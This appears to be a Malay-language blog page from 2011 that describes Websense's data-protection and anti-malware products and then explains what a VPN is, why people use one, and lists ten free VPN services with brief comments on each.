Selain penapisan, Websense juga mempunyai produk yang direka untuk lembaga perniagaan dan kerajaan yang ingin melindungi data peribadi dan sensitif. Websense Content Protection Suite direka untuk mencegah semua jenis maklumat yang sensitif (data pelanggan, kekayaan intelektual) dari bocor kepada umum. Kebocoran boleh merangkumi penggodaman dari luar atau oleh persatuan sama ada secara sengaja atau tidak dengan memindahkan data tanpa keselamatan atau protokol yang tepat.


WebBlazer : Pencegahan Malware

Produk lain yang ditawarkan adalah WebBlazer Websense, rangkaian pencegahan virus dan malware. Produk ini menapis laman phishing dan laman penipuan yang dikenali, seperti laman web yang cuba untuk merekodkan keystroke (taipan kekunci keyboard pada komputer) anda dan laman web yang cuba untuk memuat turun perisian (seperti adware, spyware dan trojan) ke komputer anda. WebBlazer boleh diintegrasikan dengan perisian Websense lain, sehingga mudah untuk menguruskannya.


Websense ThreatSeeker : Pengesanan Ancaman

Direka untuk melindungi rangkaian anda dari ancaman-ancaman pencerobohan. Websense menggunakan sistem anti pencegahan pencerobohan dan perisian antivirus. Websense ThreatSeeker dapat membantu mengurangkan kemungkinan rangkaian anda terganggu dengan terus-menerus mencari dan menilai ancaman keselamatan dan perlindungan firewall.



14 April 2011

Free VPN Service : Senarai 10 Servis VPN Percuma


Apa itu VPN? ianya adalah singkatan daripada perkataan Virtual Private Network..apa pula Virtual Private Network tu? ok..begini..ianya adalah rangkaian peribadi (private network) yang membolehkan pengguna berhubung dengan pengguna yang lain, atau remote sites menggunakan rangkaian awam (public network) iaitu internet..ia menggunakan sambungan 'maya' ke internet melalui rangkain peribadi syarikat yang menyediakannya terus kepada remote sites dan bukannya melalui sambungan fizikal..secara ringkas ia adalah rangkaian peribadi yang dibina dalam insfrastruktur rangkaian awam..




Kenapa anda memerlukan VPN?

1. Untuk melindungi privasi sama ada pada LAN ataupun pada hotspot awam (public WiFi seperti di KFC, Hentian Rehat dan Rawat dan lain-lain).

2. Pelayaran internet secara anonymous (tidak dikenal pasti).

3. Anonymity yang penuh dengan menyembunyikan IP asal anda.

4. Melepasi sekatan terhadap sesuatu laman web.

5. Tidak seperti proxy, anda mendapat sambungan yang dilindungi untuk semua program yang anda gunakan.

6. Rangkaian yang berkualiti menjamin servis VPN anda adalah pantas tidak kira dimana jua anda berada.

7. Perlindungan terhadap ISP anda.

8. Melepasi sekatan ISP untuk aplikasi VOIP seperti Skype.


Senarai 10 Servis VPN Percuma: (Top 10)


1. UltraVPN



- Percuma
- Perlu memasang (install) dan perlu membuka satu akaun sebelum dapat digunakan.


2. Logmein Hamachi



- Percuma
- Mudah untuk digunakan
- Komunikasi yang lebih selamat


3. Packetix




- Anda boleh membuat Hub Virtual VPN anda sendiri
- Antara muka laman yang mudah difahami



4. Open VPN




- Tahap keselamatan yang lebih tinggi
- Perlukan kepada pemasangan (installation)


5. Your Freedom




- Ianya bukan servis VPN, namun ia menyediakan fungsi yang serupa dengan kemudahan yang sama
- Ia menyediakan servis percuma. akan tetapi terdapat limitasi terhadap penggunaannya (6 jam sehari dan 18 jam seminggu)


6. Macro VPN



- Sama seperti servis yang lain, ia menyediakan sambungan ke internet yang lebih selamat
- Kebiasaannya menggunakan IP dari US


7. Hotspot Shield



- Perlukan kepada pemasangan
- Melindungi sambungan internet melalui HTTPS


8. It's Hidden




- Tidak perlu kepada sebarang pemasangan perisian
- Perlu membuat satu akaun untuk menggunakannya


9. Linkideo



- Servis ini perlu membayar untuk menggunakannya
- Apa yang percuma? ya..pendaftaran adalah percuma..hahaha..=D


10. Gpass



- Anda perlu memasang sebelum dapat digunakan
- Dicipta di negara China, negara yang sama mengeluarkan Ultrasurf